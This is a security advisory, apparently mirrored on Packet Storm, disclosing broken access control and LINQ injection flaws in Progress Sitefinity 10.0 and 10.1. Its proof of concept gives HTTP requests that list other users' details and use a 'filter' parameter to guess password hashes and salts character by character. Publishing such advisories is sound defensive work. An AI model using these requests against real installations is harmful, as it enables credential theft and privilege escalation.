what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Progress Sitefinity 10.0 / 10.1 Broken Access Control / LINQ Injection

Progress Sitefinity 10.0 / 10.1 Broken Access Control / LINQ Injection
Posted Nov 17, 2017
Authored by M. Li | Site sec-consult.com

Progress Sitefinity versions 10.0 and 10.1 suffer from broken access control and LINQ injection vulnerabilities.

tags | exploit, vulnerability
SHA-256 | 3b9ede0ed34ccec1a3785d53427af9ee98ed5e43eb4328b53908fb90a5292e5c

Progress Sitefinity 10.0 / 10.1 Broken Access Control / LINQ Injection

Change Mirror Download
SEC Consult Vulnerability Lab Security Advisory < 20171116-0 >
=======================================================================
title: Broken access control & LINQ injection
product: Progress Sitefinity
vulnerable version: 10.0, 10.1
fixed version: >=10.1.6527.0 (internal build), 10.2
CVE number: -
impact: High
homepage: http://www.sitefinity.com | https://www.progress.com
found: 2017-08-21
by: M. Li (Office Singapore)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

https://www.sec-consult.com

=======================================================================


Vendor description:
-------------------
"Progress Sitefinity is a content management and marketing analytics
platform designed to maximize the agility needed to succeed in todayas rapidly
changing digital marketplace.
It provides developers and IT teams the tools they need to support
enterprise-level digital marketing, optimizing the customer journey by
delivering seamless personalized experiences across different technologies and
devices. Progress is a trusted source for the digital marketing innovation
needed to create transformative customer experiences that fuel business
success."

Source: http://www.sitefinity.com/about


Business recommendation:
------------------------
SEC Consult recommends applying the provided patches by the vendor immediately.

Additionally, there are strong indications for further vulnerabilities and it
is highly suggested to perform a thorough security review by security
professionals to lower the risk of using this product.


Vulnerability overview/description:
-----------------------------------
1) Broken Access Control
By using an unprotected function, a low privileged user can extract another
user's information such as email addresses, user ID, etc.


2) LINQ Injection
The identified LINQ injection enables an authenticated user to read sensitive
data from the database. Specifically, an attacker can query the password
or its hash character by character. Depending on the version of LINQ assembly
in use, remote code execution could be possible as well.

Combining the two issues, a user could escalate her privileges.


Proof of concept:
-----------------
1) Broken Access Control
A user with a low privileged role e.g. "BackendUsers" can obtain other users'
information including email, userid etc., which is not intended for a user with
this role. The function disclosing the information is "GenericItemsService.svc"
laid under path "Common", which is in general not protected based on the role.

GET
/Sitefinity/Services/Common/GenericItemsService.svc/?itemType=Telerik.Sitefinity.Security.Model.User&itemSurrogateType=Telerik.Sitefinity.Security.Web.Services.WcfMembershipUser
HTTP/1.1
Host: [host]
...snip...

HTTP/1.1 200 OK
...snip...
{
"Context":null,
"IsGeneric":false,
"Items":[
...snip...
{
...snip...
"Email":"test0@local.host",
...snip...

],
"UserID":"cb21e9a9-992c-4f8f-9800-b03c9639b02a"
}
],
"TotalCount":3
}


2) LINQ Injection
The aforementioned function "GenericItemsService.svc", which can be invoked by
any authenticated user regardless of her privilege, can be augmented by the
parameter "filter", narrowing down the user list. However, this parameter does
not undergo any sanitization hence properties like "password" can be queried
character by character.

For instance, the request in example 1 is asking the server whether any user
has the password containing "2klv". Upon a correct guess, the reply contains
matching users' attributes. By sending multiple such queries, an attacker can
deduce the user's password hash, salt, etc. In example 2, function "Users.svc"
can be used only by users with administrator privilege.

It could also be possible to extract the password in cleartext, if the default
setting for membership format is changed.

Furthermore, depending on the third party assembly System.Linq, the issue
could be abused to execute code on the server.


Example 1:
GET
/Sitefinity/Services/Common/GenericItemsService.svc/?itemType=Telerik.Sitefinity.Security.Model.User&itemSurrogateType=Telerik.Sitefinity.Security.Web.Services.WcfMembershipUser&filter=(password.ToUpper().Contains(%222klv%22.ToUpper()))
HTTP/1.1

Example 2:
GET
/Sitefinity/Services/Security/Users.svc/?roleId=&roleProvider=&forAllProviders=false&filter=(salt.ToUpper().Contains(%225d%22.ToUpper()))
HTTP/1.1


Vulnerable / tested versions:
-----------------------------
Progress Sitefinity 10.0 and 10.1 have been tested. Version 10.1 was the latest
at the time the vulnerability was discovered. It is assumed earlier versions
of this product are also vulnerable to the issues.


Vendor contact timeline:
------------------------
2017-08-22: Contacting vendor through email
2017-08-23: Contacting vendor's security group
2017-08-23: Sending unencrypted advisory to Sitefinity Product Management
as requested by vendor
2017-08-28: Vendor acknowledged the issues
2017-10-17: Asking for update. Vendor replies that a fix will be released within
2-3 weeks
2017-11-06: Vendor states the issues are fixed in version 10.1.6527.0
2017-11-14: Asking vendor where fixed version can be found
2017-11-14: Vendor releases version 10.2
2017-11-16: Coordinated release of security advisory


Solution:
---------
According to the vendor, all the identified issues have been fixed in
version 10.1.6527.0 (internal build) and release 10.2.

https://www.sitefinity.com/product/version-notes/sitefinity-10.2
https://www.sitefinity.com/developer-network/forums/internal-builds/sitefinity-10.1-internal-builds#Hlb1FcE3622pWP8AAERlJg

Please update to the latest version immediately.


Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF M. Li / @2017

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close